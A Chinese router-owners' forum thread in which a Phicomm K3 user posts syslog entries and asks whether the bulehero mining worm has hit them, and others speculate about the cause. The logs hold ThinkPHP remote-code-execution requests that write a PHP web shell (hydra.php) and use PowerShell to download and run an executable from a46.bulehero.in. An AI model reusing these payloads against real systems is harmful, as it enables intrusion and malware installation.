这可不得了 大神来分析一下 K3被挖矿了？

ttx***

首先没有攻击任何人的意思哈 本人小白 用的各位大佬奉献的固件 万分感谢~~~~今天很忙 到晚上才有时间开电脑 鬼使神差登陆路由器看了一下日志 居然发现有蠕虫病毒bulehero的痕迹（关于蠕虫病毒bulehero，详见https://     www.freebuf.com/column/180544.html，大概就是暗中植入挖矿木马 ） 用的是A大的V2.0_2版固件，日志如下：


Feb 26 16:57:35 K3B user.notice igmp[775]: igmp:IP_ADD_MEMBERSHIP Failed
Feb 26 20:54:15 K3B user.notice igmp[775]: igmp:IP_ADD_MEMBERSHIP Failed
Feb 27 08:49:28 K3B user.err syslog: PHIAPP url:/public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.buleher
Feb 27 08:49:29 K3B user.err syslog: PHIAPP url:/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php
Feb 27 08:49:30 K3B user.err syslog: PHIAPP url:/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start%20C:/12.exe
Feb 27 09:07:23 K3B user.err syslog: PHIAPP url:/update.asp?content=2A9A826AC6FB90ECF4B2F7616AF8FF9BD1BB13C1A0FEC5F83CAAAA106FC52533617BD2A7E9691CBE2608A365D1084681159796E42CA803EBDC6420F0CD383B69162C58F94A2236651BFBE818AF0A5C678BE82E6646AFD021589D63CAB958C1A5FF04
Feb 27 12:17:34 K3B user.notice igmp[775]: igmp:IP_ADD_MEMBERSHIP Failed
Feb 27 20:26:16 K3B user.notice igmp[775]: igmp:IP_ADD_MEMBERSHIP Failed
Feb 27 21:08:08 K3B user.info sdidle[1867]: spinning up /dev/sda after 1 days 9 hours 37 mins 3 secs
Feb 27 21:29:08 K3B user.info sdidle[1867]: spinning down /dev/sda after 21 mins
Feb 27 22:04:09 K3B user.info sdidle[1867]: spinning up /dev/sda after 35 mins 1 secs
Feb 27 22:25:09 K3B user.info sdidle[1867]: spinning down /dev/sda after 21 mins
Feb 27 23:26:19 K3B user.err syslog: PHIAPP url:/cgi-bin/css/luci-static/dynaform/pc.css?_=20181218171710&height=1080&width=1920
Feb 27 23:26:30 K3B user.err syslog: PHIAPP url:/luci-static/images/map_bg.png?_=20181218171710
Feb 27 23:26:35 K3B user.err syslog: PHIAPP url:/luci-static/images/app-icon/router_status.png?_=20180710110357



那段红色错误信息是由PHIAPP发出的 PHICOMM是斐讯 这是不是公司要垮了四处散播挖矿病毒呢 大神来分析分析
看错误时间是早上 而我那时候根本没开电脑
最新的日志 依然存在 只是可执行文件变成了C:/8.exe 后面22楼有个兄弟也有同样问题 传送门https://www.right.com.cn/forum/forum.php?mod=redirect&goto=findpost&ptid=472366&pid=3589629我的是凌晨01：09 他的是凌晨02点多 这个点都没人用电脑了吧 严重怀疑是路由器里面某个恶意php文件搞的鬼 求证实。。。
Mar  1 01:09:34 K3B user.err syslog: PHIAPP url:/public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.buleher
Mar  1 01:09:35 K3B user.err syslog: PHIAPP url:/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php
Mar  1 01:09:36 K3B user.err syslog: PHIAPP url:/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe
Feb 28 23:48:04 K3B user.notice koolproxy: koolproxy error,restart koolproxy!
Mar  1 07:48:26 K3B user.notice igmp[3565]: igmp:IP_ADD_MEMBERSHIP Failed
Mar  1 08:33:09 K3B user.notice igmp[3565]: igmp:IP_ADD_MEMBERSHIP Failed
Mar  1 00:48:57 K3B user.notice koolproxy: koolproxy error,restart koolproxy!
Mar  1 09:07:22 K3B user.err syslog: PHIAPP url:/update.asp?content=2A9A826AC6FB90ECF4B2F7616AF8FF9BD1BB13C1A0FEC5F83CAAAA106FC52533617BD2A7E9691CBE2608A365D1084681159796E42CA803EBDC6420F0CD383B69162C58F94A2236651BFBE818AF0A5C678BE82E6646AFD021589D63CAB958C1A5FF04

附图

ttx***

Feb 27 08:49:30 K3B user.err syslog: PHIAPP url:/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start%20C:/12.exe
看样子是针对windows的，要下载一个http://    a46.bulehero.in/     download.exe（别去试着下，肯定不是好东西），然后保存为C:/12.exe 最后start C:/12.exe那个 url:/public/hydra.php，，，，， hydra难道是传说中的神盾局特工里面的九头蛇？？？
目前路由器cpu使用率正常，。。。

i51***

额 不是win exe 没用啊

ttx***

i51121 发表于 2019-2-28 00:24
额 不是win exe 没用啊

是啊 关键这是哪个坏东西干的呢 使用 find -name hydra.php 在 / 目录搜索 什么也没有

davi***

i51121 发表于 2019-2-28 00:24
额 不是win exe 没用啊

路由器那点算力有啥用，攻击局域网电脑才是正解

i51***

ttxl123 发表于 2019-2-28 00:25
是啊 关键这是哪个坏东西干的呢 使用 find -name hydra.php 在 / 目录搜索 什么也没有

他顶多给你弄点广告 ， 你发的那个帖子是勒索病毒，他胆子再大也不敢搞那个的

fof***

哇……还在流氓……其它型号的官修也有么？

7719***

围观一下，求真相

hea***

我用的就是这个固件，回家看看有没有

fatm***

一脸懵，求科普，是谁弄的？

黄瓜***

官方操作最为致命呀

god***

占个位置看一下结果，这玩意到底是什么漏洞

世界***

david9965 发表于 2019-2-28 00:38
路由器那点算力有啥用，攻击局域网电脑才是正解

电脑每天都有人在用，有多少人会这样进路由器里看？顶多网卡了，拔下来重新插回去一遍吧？

badc***

这个应该是斐讯的路由app相关的东西吧

jzy***

楼主,我今天也碰了一个很奇怪的事情,我的主路由是K3C刷的官改1.6,二级路由是K3刷的TB的梅林.今天早上莫名的发现,打开任何网站,浏览器的标鉴栏是域名(1×1),显示都是屏幕一片黑,中间一个白点.而且输入路由器的IP根本就进不了路由器.用手机直接连路由器,居然提示这是一个开放网络.当时以为是路由器被人黑了.断电后一切恢复正常.我把所有的密码都改了,我刚才看到你写这个帖子,我觉得好奇怪,你说到的日志里面有显示hpiapp.我的因为重启之后,日志全丢了但是在日志里面唯一能看见的就是HPI APP有几行字.